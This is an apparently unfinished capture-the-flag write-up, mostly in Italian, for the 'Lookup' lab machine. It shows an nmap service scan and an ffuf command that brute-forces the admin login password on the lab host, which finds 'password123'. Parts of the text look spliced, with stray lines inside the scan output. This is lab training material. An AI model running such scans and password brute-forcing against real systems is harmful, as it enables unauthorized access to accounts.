Lookup
Test your enumeration skills on this boot-to-root machine.
Per risolvere questa challenge dobbiamo ottenere due flag:
User flag
Root flag
Enumeration
Partiamo con la fase di enumeration
$ nmap -sV -sC <IP>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 21:d4:44:b1:43:e3:a2:ca:51:b6:2f:dd:5a:ff:45:98 (RSA)
| 256 51:57:da:91:fd:9c:38:ec:24:b2:21:d7:f5:e0:cf:69 (ECDSA)
|_ 256 68:dc:d7:0b:94:e6:c4:d1:62:ca:8b:a1:c2:d1:e9:6d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelLet's check port 80 on our browser.
ffuf -u http://lookup.thm/login.php -X POST -d "username=admin&password=FUZZ" -w /home/kali/Documents/Hacking_stuff/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -H "Content-Type: application/x-www-form-urlencoded" -fs 62
________________________________________________
password123 [Status: 200, Size: 74, Words: 10, Lines: 1, Duration: 66ms]
La risposta è diversa in dimensione ma se proviamo ad inserire la combinazione admin:password123 viene restituito nuovamente errore in fase di login.
Questo potrebbe suggerire che forse abbiamo trovato la password giusta ma per lo username sbagliato.
Last updated